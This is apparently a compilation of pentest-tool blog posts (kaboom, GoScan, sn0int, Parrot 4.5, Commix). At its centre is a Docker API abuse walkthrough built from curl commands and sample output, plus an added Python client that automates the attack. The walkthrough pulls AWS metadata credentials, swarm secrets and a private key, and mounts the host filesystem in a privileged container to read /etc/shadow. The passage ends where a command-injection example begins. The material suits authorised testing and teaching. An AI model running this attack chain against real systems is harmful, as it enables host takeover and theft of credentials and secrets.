Kaboom – Automatic Pentest

kaboom is a script that automates the penetration test. It performs several tasks for each phase of a pentest:

Information gathering [nmap, unicornscan]
  - TCP scan
  - UDP scan

Vulnerability assessment [nmap, nikto, dirb, searchsploit, msfconsole]
  It tests several services: smb, ssh, snmp, smtp, ftp, tftp, ms-sql, mysql, rdp, http, https and more. It finds the CVEs and then searches for them on exploit-db or in the Metasploit db.

Exploitation [hydra]
  - brute force ssh

Usage

kaboom supports two modes:

Interactive mode:
  kaboom [ENTER] ...and the script does the rest

Non-interactive mode:
  kaboom <nic> <target_ip> [-s or --shutdown]

If you use the shutdown option, kaboom will shut down the machine at the end of its tasks.

If you want to see this help:
  kaboom -h (or --help)

Directory Hierarchy

kaboom saves the results of commands in this way:

Download Kaboom

Link: http://www.kitploit.com/2019/02/kaboom-automatic-pentest.html

Goscan – Interactive Network Scanner

GoScan is an interactive network scanner client, featuring auto-completion, which provides abstraction and automation over nmap.

Although it started as a small side-project I developed in order to learn @golang, GoScan can now be used to perform host discovery, port scanning, and service enumeration not only in situations where being stealthy is not a priority and time is limited (think CTFs, OSCP, exams, etc.), but also (with a few tweaks in its configuration) during professional engagements.

GoScan is also particularly suited for unstable environments (think unreliable network connectivity, lack of "screen", etc.), given that it fires scans and maintains their state in an SQLite database. Scans run in the background (detached from the main thread), so even if the connection to the box running GoScan is lost, results can be uploaded asynchronously (more on this below). That is, data can be imported into GoScan at different stages of the process, without the need to restart the entire process from scratch if something goes wrong.

In addition, the Service Enumeration phase integrates a collection of other tools (e.g., EyeWitness, Hydra, nikto, etc.), each one tailored to target a specific service.
Installation

Binary installation (Recommended)

Binaries are available from the Release page.

  # Linux (64bit)
  $ wget https://github.com/marco-lancini/goscan/releases/download/v2.1/goscan_2.1_linux_amd64.zip
  $ unzip goscan_2.1_linux_amd64.zip

  # Linux (32bit)
  $ wget https://github.com/marco-lancini/goscan/releases/download/v2.1/goscan_2.1_linux_386.zip
  $ unzip goscan_2.1_linux_386.zip

  # After that, place the executable in your PATH
  $ chmod +x goscan
  $ sudo mv ./goscan /usr/local/bin/goscan

Build from source

  $ git clone https://github.com/marco-lancini/goscan.git
  $ cd goscan/goscan/
  $ make setup
  $ make build

To create a multi-platform binary, use the cross command via make:

  $ make cross

Docker

  $ git clone https://github.com/marco-lancini/goscan.git
  $ cd goscan/
  $ docker-compose up --build

Usage

GoScan supports all the main steps of network enumeration:

Step                    Commands
1. Load targets         Add a single target via the CLI (must be a /32): load target SINGLE <IP>
                        Upload multiple targets from a text file or folder: load target MULTI <path-to-file>
2. Host Discovery       Perform a Ping Sweep: sweep <TYPE> <TARGET>
                        Or load results from a previous discovery:
                          Add a single alive host via the CLI (must be a /32): load alive SINGLE <IP>
                          Upload multiple alive hosts from a text file or folder: load alive MULTI <path-to-file>
3. Port Scanning        Perform a port scan: portscan <TYPE> <TARGET>
                        Or upload nmap results from XML files or folder: load portscan <path-to-file>
4. Service Enumeration  Dry Run (only show commands, without performing them): enumerate <TYPE> DRY <TARGET>
                        Perform enumeration of detected services: enumerate <TYPE> <POLITE/AGGRESSIVE> <TARGET>
5. Special Scans        EyeWitness
                          Take screenshots of websites, RDP services, and open VNC servers (KALI ONLY): special eyewitness
                          (EyeWitness.py needs to be in the system path)
                        Domain
                          Extract (Windows) domain information from enumeration data: special domain <users/hosts/servers>
                        DNS
                          Enumerate DNS (nmap, dnsrecon, dnsenum): special dns DISCOVERY <domain>
                          Bruteforce DNS: special dns BRUTEFORCE <domain>
                          Reverse Bruteforce DNS: special dns BRUTEFORCE_REVERSE <domain> <base_IP>
Utils                   Show results: show <targets/hosts/ports>
                        Change the output folder (by default ~/goscan): set output_folder <PATH>
                        Modify the default nmap switches: set nmap_switches <SWEEP/TCP_FULL/TCP_STANDARD/TCP_VULN/UDP_STANDARD> <SWITCHES>
                        Modify the default wordlists: set_wordlists <FINGER_USER/FTP_USER/...> <PATH>

External Integrations

The Service Enumeration phase currently supports the following integrations:

WHAT     INTEGRATION
ARP      nmap
DNS      nmap, dnsrecon, dnsenum, host
FINGER   nmap, finger-user-enum
FTP      nmap, ftp-user-enum, hydra [AGGRESSIVE]
HTTP     nmap, nikto, dirb, EyeWitness, sqlmap [AGGRESSIVE], fimap [AGGRESSIVE]
RDP      nmap, EyeWitness
SMB      nmap, enum4linux, nbtscan, samrdump
SMTP     nmap, smtp-user-enum
SNMP     nmap, snmpcheck, onesixtyone, snmpwalk
SSH      hydra [AGGRESSIVE]
SQL      nmap
VNC      EyeWitness

Download Goscan

Link: http://feedproxy.google.com/~r/PentestTools/~3/uz1Ra9_76sE/goscan-interactive-network-scanner.html

Abusing Docker API | Socket

Notes on abusing open Docker sockets. This won't cover breaking out of docker containers.

Ports: usually 2375 (plain HTTP) and 2376 (TLS), but can be anything.

Refs:
  https://blog.sourcerer.io/a-crash-course-on-docker-learn-to-swim-with-the-big-fish-6ff25e8958b0
  https://www.slideshare.net/BorgHan/hacking-docker-the-easy-way
  https://blog.secureideas.com/2018/05/escaping-the-whale-things-you-probably-shouldnt-do-with-docker-part-1.html
  https://blog.secureideas.com/2018/08/escaping-the-whale-things-you-probably-shouldnt-do-with-docker-part-2.html
  https://infoslack.com/devops/exploring-docker-remote-api
  https://www.blackhat.com/docs/us-17/thursday/us-17-Cherny-Well-That-Escalated-Quickly-How-Abusing-The-Docker-API-Led-To-Remote-Code-Execution-Same-Origin-Bypass-And-Persistence_wp.pdf
  https://raesene.github.io/blog/2016/03/06/The-Dangers-Of-Docker.sock/
  https://cert.litnet.lt/2016/11/owning-system-through-an-exposed-docker-engine/
  https://medium.com/@riccardo.ancarani94/attacking-docker-exposed-api-3e01ffc3c124
  https://www.exploit-db.com/exploits/42356
  https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/docker_daemon_tcp.rb
  http://blog.nibblesec.org/2014/09/abusing-dockers-remote-apis.html
  https://www.prodefence.org/knock-knock-docker-will-you-let-me-in-open-api-abuse-in-docker-containers/
  https://blog.ropnop.com/plundering-docker-images/

Enable docker socket (create practice locations):
  https://success.docker.com/article/how-do-i-enable-the-remote-api-for-dockerd

Having the docker API | socket exposed is essentially granting root on the host that runs Docker, and with it root in every container on that system (the host-mount container at the end of these notes shows why).

The daemon listens on unix:///var/run/docker.sock by default, but you can bind Docker to another host/port or a different Unix socket. The docker socket is the socket the Docker daemon listens on by default and it can be used to communicate with the daemon from within a container, or, if configured, from outside the container against the host running docker. All the docker socket magic is happening via the docker API.
For example, if we wanted to spin up an nginx container we'd do the below.

Create an nginx container

The following command uses curl to send the {"Image":"nginx"} payload to the /containers/create endpoint of the Docker daemon through the unix socket. This will create a container based on nginx and return its ID.

  $ curl -XPOST --unix-socket /var/run/docker.sock -d '{"Image":"nginx"}' -H 'Content-Type: application/json' http://localhost/containers/create
  {"Id":"fcb65c6147efb862d5ea3a2ef20e793c52f0fafa3eb04e4292cb4784c5777d65","Warnings":null}

Start the container

  $ curl -XPOST --unix-socket /var/run/docker.sock http://localhost/containers/fcb65c6147efb862d5ea3a2ef20e793c52f0fafa3eb04e4292cb4784c5777d65/start

As mentioned above, you can also have the docker socket listen on a TCP port. You can validate it's docker by hitting it with a version request:

  $ curl -s http://open.docker.socket:2375/version | jq
  {
    "Version": "1.13.1",
    "ApiVersion": "1.26",
    "MinAPIVersion": "1.12",
    "GitCommit": "07f3374/1.13.1",
    "GoVersion": "go1.9.4",
    "Os": "linux",
    "Arch": "amd64",
    "KernelVersion": "3.10.0-514.26.2.el7.x86_64",
    "BuildTime": "2018-12-07T16:13:51.683697055+00:00",
    "PkgVersion": "docker-1.13.1-88.git07f3374.el7.centos.x86_64"
  }

or with the docker client:

  $ docker -H open.docker.socket:2375 version
  Server:
   Engine:
    Version:          1.13.1
    API version:      1.26 (minimum version 1.12)
    Go version:       go1.9.4
    Git commit:       07f3374/1.13.1
    Built:            Fri Dec  7 16:13:51 2018
    OS/Arch:          linux/amd64
    Experimental:     false

An exposed daemon is basically a shell into every container it runs. Get a list of running containers with the ps command:

  $ docker -H open.docker.socket:2375 ps
  CONTAINER ID   IMAGE                                               COMMAND                  CREATED      STATUS      PORTS                                           NAMES
  72cd30d28e5c   gogs/gogs                                           "/app/gogs/docker/st…"   5 days ago   Up 5 days   0.0.0.0:3000->3000/tcp, 0.0.0.0:10022->22/tcp   gogs
  b522a9034b30   jdk1.8                                              "/bin/bash"              5 days ago   Up 5 days                                                   myjdk8
  0f5947860c17   centos/mysql-57-centos7                             "container-entrypoin…"   8 days ago   Up 8 days   0.0.0.0:3306->3306/tcp                          mysql
  3965c004c7a7   192.168.32.134:5000/tensquare_config:1.0-SNAPSHOT   "java -jar /app.jar"     8 days ago   Up 8 days   0.0.0.0:12000->12000/tcp                        config
  3f466b754971   42cb59080921                                        "/bin/bash"              8 days ago   Up 8 days                                                   jdk8
  6499013fdc2d   registry                                            "/entrypoint.sh /etc…"   8 days ago   Up 8 days   0.0.0.0:5000->5000/tcp                          registry

Exec into one of the containers:

  $ docker -H open.docker.socket:2375 exec -it mysql /bin/bash
  bash-4.2$ whoami
  mysql

Other commands

Are there some stopped containers?

  $ docker -H open.docker.socket:2375 ps -a

What are the images pulled on the host machine?

  $ docker -H open.docker.socket:2375 images

I've frequently not been able to get the docker client to work well when it comes to the exec command, but you can still exec code in the container with the API. The example below uses curl to interact with the API over https (if enabled): create an exec job, set up the variable to receive the output, and then start the exec so you can get the output.

Using curl to hit the API

Sometimes you'll see 2376 up for the TLS endpoint. I haven't been able to connect to it with the docker client, but you can hit the docker API with curl no problem.

Docker socket to metadata URL

https://docs.docker.com/engine/api/v1.37/#operation/ContainerExec

Below is an example of hitting the internal AWS metadata URL and getting the output.

List containers:

  $ curl --insecure https://tls-opendocker.socket:2376/containers/json | jq
  [
    {
      "Id": "f9cecac404b01a67e38c6b4111050c86bbb53d375f9cca38fa73ec28cc92c668",
      "Names": [
        "/docker_snip_1"
      ],
      "Image": "dotnetify",
      "ImageID": "sha256:23b66a91f928ea6a49bce1be4eabedbafd41c5dfa4e76c1a94062590e54550ca",
      "Command": "cmd /S /C 'dotnet netify-temp.dll'",
      "Created": 1541018555,
      "Ports": [
        {
          "IP": "0.0.0.0",
          "PrivatePort": 443,
          "PublicPort": 50278,
  --SNIP--

List processes in a container:

  $ curl --insecure https://tls-opendocker.socket:2376/containers/f9cecac404b01a67e38c6b4111050c86bbb53d375f9cca38fa73ec28cc92c668/top | jq
  {
    "Processes": [
      [ "smss.exe",     "7868",  "00:00:00.062", "225.3kB" ],
      [ "csrss.exe",    "10980", "00:00:00.859", "421.9kB" ],
      [ "wininit.exe",  "10536", "00:00:00.078", "606.2kB" ],
      [ "services.exe", "10768", "00:00:00.687", "1.208MB" ],
      [ "lsass.exe",    "10416", "00:00:36.000", "4.325MB" ],
  --SNIP--

Set up an exec job to hit the metadata URL:

  $ curl --insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/blissful_engelbart/exec -d '{ "AttachStdin": false, "AttachStdout": true, "AttachStderr": true, "Cmd": ["/bin/sh", "-c", "wget -qO- http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance"]}'
  {"Id":"4353567ff39966c4d231e936ffe612dbb06e1b7dd68a676ae1f0a9c9c0662d55"}

Get the output:

  $ curl --insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/exec/4353567ff39966c4d231e936ffe612dbb06e1b7dd68a676ae1f0a9c9c0662d55/start -d '{}'
  {
    "Code" : "Success",
    "LastUpdated" : "2019-01-29T20:12:58Z",
    "Type" : "AWS-HMAC",
    "AccessKeyId" : "ASIATRSNIP",
    "SecretAccessKey" : "CD6/h/egYHmYUSNIPSNIPSNIPSNIPSNIP",
    "Token" : "FQoGZXIvYXdzEB4aDCQSM0rRV/SNIPSNIPSNIP",
    "Expiration" : "2019-01-30T02:43:34Z"
  }

Docker secrets

Relevant reading: https://docs.docker.com/engine/swarm/secrets/

List secrets (no secrets / swarm not set up):

  $ curl -s --insecure https://tls-opendocker.socket:2376/secrets | jq
  {
    "message": "This node is not a swarm manager. Use \"docker swarm init\" or \"docker swarm join\" to connect this node to swarm and try again."
  }

List secrets (they exist):

  $ curl -s --insecure https://tls-opendocker.socket:2376/secrets | jq
  [
    {
      "ID": "9h3useaicj3tr465ejg2koud5",
      "Version": {
        "Index": 21
      },
      "CreatedAt": "2018-07-06T10:19:50.677702428Z",
      "UpdatedAt": "2018-07-06T10:19:50.677702428Z",
      "Spec": {
        "Name": "registry-key.key",
        "Labels": {}
      }
    },

Check what is mounted:

  $ curl --insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/e280bd8c8feaa1f2c82cabbfa16b823f4dd42583035390a00ae4dce44ffc7439/exec -d '{ "AttachStdin": false, "AttachStdout": true, "AttachStderr": true, "Cmd": ["/bin/sh", "-c", "mount"]}'
  {"Id":"7fe5c7d9c2c56c2b2e6c6a1efe1c757a6da1cd045d9b328ea9512101f72e43aa"}

Get the output by starting the exec:

  $ curl --insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/exec/7fe5c7d9c2c56c2b2e6c6a1efe1c757a6da1cd045d9b328ea9512101f72e43aa/start -d '{}'
  overlay on / type overlay
  proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)
  tmpfs on /dev type tmpfs (rw,nosuid,size=65536k,mode=755)
  devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=666)
  sysfs on /sys type sysfs (ro,nosuid,nodev,noexec,relatime)
  --SNIP--
  mqueue on /dev/mqueue type mqueue (rw,nosuid,nodev,noexec,relatime)
  /dev/sda2 on /etc/resolv.conf type ext4 (rw,relatime,errors=remount-ro,data=ordered)
  /dev/sda2 on /etc/hostname type ext4 (rw,relatime,errors=remount-ro,data=ordered)
  /dev/sda2 on /etc/hosts type ext4 (rw,relatime,errors=remount-ro,data=ordered)
  shm on /dev/shm type tmpfs (rw,nosuid,nodev,noexec,relatime,size=65536k)
  /dev/sda2 on /var/lib/registry type ext4 (rw,relatime,errors=remount-ro,data=ordered)
  tmpfs on /run/secrets/registry-cert.crt type tmpfs (ro,relatime)
  tmpfs on /run/secrets/htpasswd type tmpfs (ro,relatime)
  tmpfs on /run/secrets/registry-key.key type tmpfs (ro,relatime)
  --SNIP--

Cat the mounted secret:

  $ curl --insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/e280bd8c8feaa1f2c82cabbfa16b823f4dd42583035390a00ae4dce44ffc7439/exec -d '{ "AttachStdin": false, "AttachStdout": true, "AttachStderr": true, "Cmd": ["/bin/sh", "-c", "cat /run/secrets/registry-key.key"]}'
  {"Id":"3a11aeaf81b7f343e7f4ddabb409ad1eb6024141a2cfd409e5e56b4f221a7c30"}

  $ curl --insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/exec/3a11aeaf81b7f343e7f4ddabb409ad1eb6024141a2cfd409e5e56b4f221a7c30/start -d '{}'
  -----BEGIN RSA PRIVATE KEY-----
  MIIJKAIBAAKCAgEA1A/ptrezfxUlupPgKd/kAki4UlKSfMGVjD6GnJyqS0ySHiz0
  --SNIP--

If you have secrets, it's also worth checking out services in case they are adding secrets via environment variables:

  $ curl -s --insecure https://tls-opendocker.socket:2376/services | jq
  [
    {
      "ID": "amxjs243dzmlc8vgukxdsx57y",
      "Version": {
        "Index": 6417
      },
      "CreatedAt": "2018-04-16T19:51:20.489851317Z",
      "UpdatedAt": "2018-12-07T13:44:36.6869673Z",
      "Spec": {
        "Name": "app_REMOVED",
        "Labels": {},
        "TaskTemplate": {
          "ContainerSpec": {
            "Image": "dpage/pgadmin4:latest@sha256:5b8631d35db5514d173ad2051e6fc6761b4be6c666105f968894509c5255c739",
            "Env": [
              "PGADMIN_DEFAULT_EMAIL=REMOVED",
              "PGADMIN_DEFAULT_PASSWORD=REMOVED"
            ],
            "Isolation": "default"
  --SNIP--

Creating a container that has mounted the host file system

  $ curl --insecure -X POST -H "Content-Type: application/json" "https://tls-opendocker.socket:2376/containers/create?name=test" -d '{"Image":"alpine", "Cmd":["/usr/bin/tail", "-f", "1234", "/dev/null"], "Binds": [ "/:/mnt" ], "Privileged": true}'
  {"Id":"0f7b010f8db33e6abcfd5595fa2a38afd960a3690f2010282117b72b08e3e192","Warnings":null}

  $ curl --insecure -X POST -H "Content-Type: application/json" "https://tls-opendocker.socket:2376/containers/0f7b010f8db33e6abcfd5595fa2a38afd960a3690f2010282117b72b08e3e192/start?name=test"

(In the documented API, Binds and Privileged live under HostConfig; the daemon also accepts them at the top level of the create body for backwards compatibility with old clients, which is why the request above works.)

Read something from the host:

  $ curl --insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/0f7b010f8db33e6abcfd5595fa2a38afd960a3690f2010282117b72b08e3e192/exec -d '{ "AttachStdin": false, "AttachStdout": true, "AttachStderr": true, "Cmd": ["/bin/sh", "-c", "cat /mnt/etc/shadow"]}'
  {"Id":"140e09471b157aa222a5c8783028524540ab5a55713cbfcb195e6d5e9d8079c6"}

  $ curl --insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/exec/140e09471b157aa222a5c8783028524540ab5a55713cbfcb195e6d5e9d8079c6/start -d '{}'
  root:$6$THEPASSWORDHASHWUZHERE:17717:0:99999:7:::
  daemon:*:17001:0:99999:7:::
  bin:*:17001:0:99999:7:::
  sys:*:17001:0:99999:7:::
  sync:*:17001:0:99999:7:::
  games:*:17001:0:99999:7:::

Cleanup

Stop the container:

  $ curl --insecure -vv -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/0f7b010f8db33e6abcfd5595fa2a38afd960a3690f2010282117b72b08e3e192/stop

Delete stopped containers:

  $ curl --insecure -vv -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/prune

Note that /containers/prune removes every stopped container on the host, not just the one you created. On an engagement, remove only your own with DELETE /containers/<id> so you don't destroy the customer's stopped containers.
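The exec round trip above (create the exec job, start it, collect the output) and the privileged host-mount container, as an added Python example that is not part of the original post. It talks to the same Engine API endpoints with only the standard library; the daemon address is a placeholder like the post's hostnames and the helper names are mine. The one thing curl hides is that POST /exec/{id}/start returns a multiplexed stream when Tty is false, so a program has to strip the 8-byte frame headers before the stdout/stderr bytes are usable.

```python
# Added example (not code from the original post): a minimal Docker Engine API
# client for /version, /containers/json, /containers/create (+ /start),
# /containers/{id}/exec and /exec/{id}/start.  DAEMON is a hypothetical address.
import json
import ssl
import struct
import urllib.request
from typing import Optional, Tuple

DAEMON = "http://open.docker.socket:2375"  # hypothetical; use https://host:2376 for the TLS endpoint


def api(method: str, path: str, body: Optional[dict] = None, base: str = DAEMON) -> bytes:
    """Send one request to the Engine API and return the raw response body."""
    data = json.dumps(body).encode() if body is not None else None
    req = urllib.request.Request(base + path, data=data, method=method,
                                 headers={"Content-Type": "application/json"})
    ctx = None
    if base.startswith("https://"):
        # Equivalent of curl --insecure: the post's 2376 endpoint had a self-signed cert
        # and did not demand a client certificate, so skip server verification.
        ctx = ssl.create_default_context()
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
    with urllib.request.urlopen(req, timeout=15, context=ctx) as resp:
        return resp.read()


def fingerprint(version_body: bytes) -> Tuple[str, str]:
    """Confirm the listener is Docker from GET /version: returns (Version, ApiVersion)."""
    v = json.loads(version_body)
    return v["Version"], v["ApiVersion"]


def host_mount_spec(image: str = "alpine", mount_point: str = "/mnt") -> dict:
    """Body for POST /containers/create: bind the host's / into the container, run privileged.
    Binds/Privileged sit under HostConfig in the documented API (the post sends them at
    top level, which the daemon still accepts for backwards compatibility)."""
    return {
        "Image": image,
        "Cmd": ["/bin/sh", "-c", "tail -f /dev/null"],  # keep the container alive for exec
        "HostConfig": {"Binds": [f"/:{mount_point}"], "Privileged": True},
    }


def exec_spec(cmd: str) -> dict:
    """Body for POST /containers/{id}/exec, the same shape as the post's curl payloads."""
    return {"AttachStdin": False, "AttachStdout": True, "AttachStderr": True,
            "Cmd": ["/bin/sh", "-c", cmd]}


def demux(stream: bytes) -> Tuple[bytes, bytes]:
    """Split the raw stream returned by POST /exec/{id}/start when Tty is false.
    Each frame is an 8-byte header [type, 0, 0, 0, len (uint32 big-endian)] followed by
    len payload bytes; type 1 is stdout, type 2 is stderr.  curl just prints the bytes
    and the terminal swallows the unprintable headers, which is why the post's output
    looks clean.  (With Tty=true the stream is raw and needs no demuxing.)"""
    out, err, pos = bytearray(), bytearray(), 0
    while pos + 8 <= len(stream):
        kind = stream[pos]
        size = struct.unpack(">I", stream[pos + 4:pos + 8])[0]
        payload = stream[pos + 8:pos + 8 + size]
        if len(payload) != size:
            raise ValueError("truncated frame")
        (out if kind == 1 else err).extend(payload)
        pos += 8 + size
    if pos != len(stream):
        raise ValueError("trailing bytes after last frame")
    return bytes(out), bytes(err)


def run_in(container: str, cmd: str, base: str = DAEMON) -> Tuple[bytes, bytes]:
    """Create an exec job in `container`, start it, return (stdout, stderr)."""
    exec_id = json.loads(api("POST", f"/containers/{container}/exec", exec_spec(cmd), base))["Id"]
    return demux(api("POST", f"/exec/{exec_id}/start", {}, base))


def read_host_file(path: str, base: str = DAEMON) -> bytes:
    """The post's last step end to end: privileged host-mount container, read one host
    file through it, then stop and delete only that container (not /containers/prune)."""
    cid = json.loads(api("POST", "/containers/create", host_mount_spec(), base))["Id"]
    try:
        api("POST", f"/containers/{cid}/start", {}, base)
        out, _ = run_in(cid, f"cat /mnt{path}", base)
        return out
    finally:
        api("POST", f"/containers/{cid}/stop", {}, base)
        api("DELETE", f"/containers/{cid}", None, base)


if __name__ == "__main__":
    print("docker %s (api %s)" % fingerprint(api("GET", "/version")))
    for c in json.loads(api("GET", "/containers/json")):
        print(c["Id"][:12], c["Image"], c["Names"])
    print(read_host_file("/etc/hostname").decode())
```

Point it at a TLS endpoint by setting DAEMON to https://host:2376; if the daemon was started with --tlsverify it will reject the connection without a client certificate, which matches the post's observation that only some 2376 listeners answer curl --insecure.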

Link: http://carnal0wnage.attackresearch.com/2019/02/abusing-docker-api-socket.html

Sn0Int – Semi-automatic OSINT Framework And Package Manager

sn0int is a semi-automatic OSINT framework and package manager. It was built for IT security professionals and bug hunters to gather intelligence about a given target or about yourself. sn0int enumerates attack surface by semi-automatically processing public information and mapping the results in a unified format for followup investigations.

Among other things, sn0int is currently able to:
  - Harvest subdomains from certificate transparency logs
  - Harvest subdomains from various passive dns logs
  - Sift through subdomain results for publicly accessible websites
  - Harvest emails from pgp keyservers
  - Enrich ip addresses with ASN and geoip info
  - Harvest subdomains from the wayback machine
  - Gather information about phonenumbers
  - Bruteforce interesting urls

sn0int is heavily inspired by recon-ng and maltego, but remains more flexible and is fully open source. None of the investigations listed above are hardcoded in the source; instead they are provided by modules that are executed in a sandbox. You can easily extend sn0int by writing your own modules and share them with other users by publishing them to the sn0int registry. This allows you to ship updates for your modules on your own, since you don't need to send a pull request.

Join on IRC: irc.hackint.org:6697/#sn0int

Documentation index:

Getting started
  Installation: Archlinux, Debian/Ubuntu/Kali, Alpine, Docker, OpenBSD, Mac OSX, Windows
  Running your first investigation: Installing the default modules, Adding something to scope, Running a module, Running followup modules on the results, Unscoping entities
Scripting: Write your first module, Publish your module
Database: db_add, db_update, db_select
Keyring: Managing the keyring, Using access keys in scripts, Using access keys as source argument
Configuration: Configuring a proxy
Sandbox: Linux, OpenBSD, IPC Protocol, Limitations
Function reference: clear_err, db_add, db_select, db_update, dns, error, asn_lookup, geoip_lookup, html_select, html_select_list, http_mksession, http_request, http_send, info, json_decode, json_decode_stream, json_encode, keyring, last_err, pgp_pubkey, pgp_pubkey_armored, print, psl_domain_from_dns_name, regex_find, regex_find_all, sleep, status, stdin_readline, url_decode, url_encode, url_escape, url_join, url_parse, url_unescape, utf8_decode, x509_parse_pem

Download Sn0Int

Link: http://www.kitploit.com/2019/01/sn0int-semi-automatic-osint-framework.html

Parrot Security 4.5 – Security GNU/Linux Distribution Designed with Cloud Pentesting and IoT Security in Mind

Parrot 4.5 is officially released, and there are some major changes under the hood, powered by the long-term supported Linux 4.19 kernel series, preparing the project for the upcoming Parrot 5.0 LTS release. For future releases, Parrot Security plans to support two kernels, a stable kernel and a testing kernel.

Parrot 4.5 also comes with the latest Metasploit 5.0 penetration testing framework, which introduces major features like new evasion modules, a new search engine, a JSON-RPC daemon, integrated web services, and support for writing shellcode in C.

This release improves the metapackages for developers, making it a lot easier to set up an advanced development environment for multiple frameworks and programming languages. These include parrot-devel, parrot-devel-tools, and parrot-devel-extra.

Parrot 4.5 drops support for 32-bit computers

On the other hand, Parrot 4.5 is the first release of the ethical hacking operating system to no longer ship with installation or live images for older, 32-bit only computers. With this, Parrot joins the growing trend of GNU/Linux distributions dropping 32-bit images. However, the developers noted that they will continue to support the 32-bit architecture with updates through the official software repositories for existing users.

Better Dev Tools

There are updates in the metapackages for developers, and setting up an advanced development environment for several programming languages and frameworks is now easier than ever.

parrot-devel

It is pre-installed in Parrot 4.5 and provides the following tools:
  - vscodium – an advanced and extensible text editor.
  - zeal – an offline documentation downloader and browser.
  - git-cola – a graphical client for Git.
  - meld – a graphical patch inspector.
  - tora – a graphical database frontend compatible with several database backends.

These packages are included in the metapackage by using the "Recommends" apt directive, and they can be removed individually without triggering the removal of the whole parrot-devel metapackage. The metapackage also recommends the installation of parrot-devel-tools.

  sudo apt update
  sudo apt install parrot-devel

parrot-devel-tools

It is recommended by parrot-devel and pre-installed in Parrot Security. It provides some useful compilers and interpreters for the most used languages and provides the following packages:
  - GCC/G++ – a compiler collection for C, C++ and other languages.
  - python3 – the cpython interpreter for the python 3.6 and 3.7 language.
  - ruby – the official ruby lang interpreter and basic toolkit (includes irb and ri as well).

The package also recommends the following packages, which can be safely removed without triggering the removal of the entire parrot-devel-tools metapackage:
  - default-jdk – the latest Java OpenJDK distribution for Java 11 (both JDK and JRE).
  - cython3 – a compiler for the cython language, a strongly-typed dialect of python for efficient code.
  - rust/cargo – the rust compiler and devel tools and its package management system.
  - valac – the vala c compiler.
  - mono-devel – the development tools for the MONO framework, an open source implementation of .net.
  - mono-runtime – the runtime of the MONO framework, compatible and interoperable with the latest .net runtime.
  - php-cli – the PHP 7.3 language plus its command line interface and some useful core libraries.
  - perl6 – the PERL 6 interpreter and core libraries.

  sudo apt update
  sudo apt install parrot-devel-tools

parrot-devel-extra

The parrot-devel-extra metapackage is a quick way to install many additional development utilities like advanced IDEs, additional languages, debuggers and extra tools:
  - golang – go language compiler and runtime
  - nodejs – node.js framework
  - npm – node.js package manager
  - atom – advanced and extensible editor by github
  - qtcreator – powerful C, C++ and Qt/QML IDE and debugger.
  - kdevelop – advanced general purpose IDE by KDE.
  - edb-debugger – graphical debugger.
  - jad – Java decompiler.
  - nasm – powerful general purpose x86 assembler.
  - radare2 – advanced command line hexadecimal editor.
  - cmake – cross-platform, open-source make system.
  - valgrind – instrumentation framework for building dynamic analysis tools.
  - devscripts/build-essential – useful development utilities for debian developers/maintainers.

  sudo apt update
  sudo apt install parrot-devel-extra

Download Parrot Security 4.5

Link: http://feedproxy.google.com/~r/PentestTools/~3/xXnhQTKJewU/parrot-security-45-security-gnulinux.html

Commix v2.7 – Automated All-in-One OS Command Injection And Exploitation Tool

Commix (short for [comm]and [i]njection e[x]ploiter) is an automated tool written by Anastasios Stasinopoulos (@ancst) that can be used by web developers, penetration testers or even security researchers in order to test web-based applications with the view to find bugs, errors or vulnerabilities related to command injection attacks. By using this tool, it is very easy to find and exploit a command injection vulnerability in a certain vulnerable parameter or HTTP header.

Requirements

Python version 2.6.x or 2.7.x is required for running this program.

Installation

Download commix by cloning the Git repository:

  git clone https://github.com/commixproject/commix.git commix

Commix comes packaged in the official repositories of the following Linux distributions, so you can use the package manager to install it:
  - ArchStrike
  - BlackArch Linux
  - BackBox
  - Kali Linux
  - Parrot Security OS
  - Weakerthan Linux

Commix also comes as a plugin on the following penetration testing frameworks:
  - TrustedSec's Penetration Testers Framework (PTF)
  - OWASP Offensive Web Testing Framework (OWTF)
  - CTF-Tools
  - PentestBox
  - PenBox
  - Katoolin
  - Aptive's Penetration Testing tools
  - Homebrew Tap – Pen Test Tools

Supported Platforms
  - Linux
  - Mac OS X
  - Windows (experimental)

Usage

To get a list of all options and switches use:

  python commix.py -h

Q: Where can I check all the available options and switches?
A: Check the 'usage' wiki page.

Usage Examples
Q: Can I get some basic ideas on how to use commix?
A: Just go and check the 'usage examples' wiki page, where there are several test cases and attack scenarios.

Upload Shells
Q: How easily can I upload web-shells on a target host via commix?
A: Commix enables you to upload web-shells (e.g. metasploit PHP meterpreter) easily on the target host. For more, check the 'upload shells' wiki page.

Modules Development
Q: Do you want to increase the capabilities of the commix tool and/or adapt it to your needs?
A: You can easily develop and import your own modules. For more, check the 'module development' wiki page.

Command Injection Testbeds
Q: How can I test or evaluate the exploitation abilities of commix?
A: Check the 'command injection testbeds' wiki page, which includes a collection of pwnable web applications and/or VMs (that include web applications) vulnerable to command injection attacks.

Exploitation Demos
Q: Is there a place where I can check for demos of commix?
A: If you want to see a collection of demos about the exploitation abilities of commix, take a look at the 'exploitation demos' wiki page.

Bugs and Enhancements
Q: I found a bug / I have to suggest a new feature! What can I do?
A: For bug reports or enhancements, please open an issue here.

Presentations and White Papers
Q: Is there a place where I can find presentations and/or white papers regarding commix?
A: For presentations and/or white papers published in conferences, check the 'presentations' wiki page.

Download Commix
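The bug class commix hunts for, as an added example that is not commix's own code: a "ping this host" feature with the user-supplied parameter pasted into a shell string, next to a hardened version that allow-lists the input and runs the binary without a shell. The function names and payloads are mine; the payloads mimic the separator and command-substitution shapes an injection tool sends to a parameter.

```python
# Added example (not commix code): OS command injection, vulnerable vs hardened.
import re
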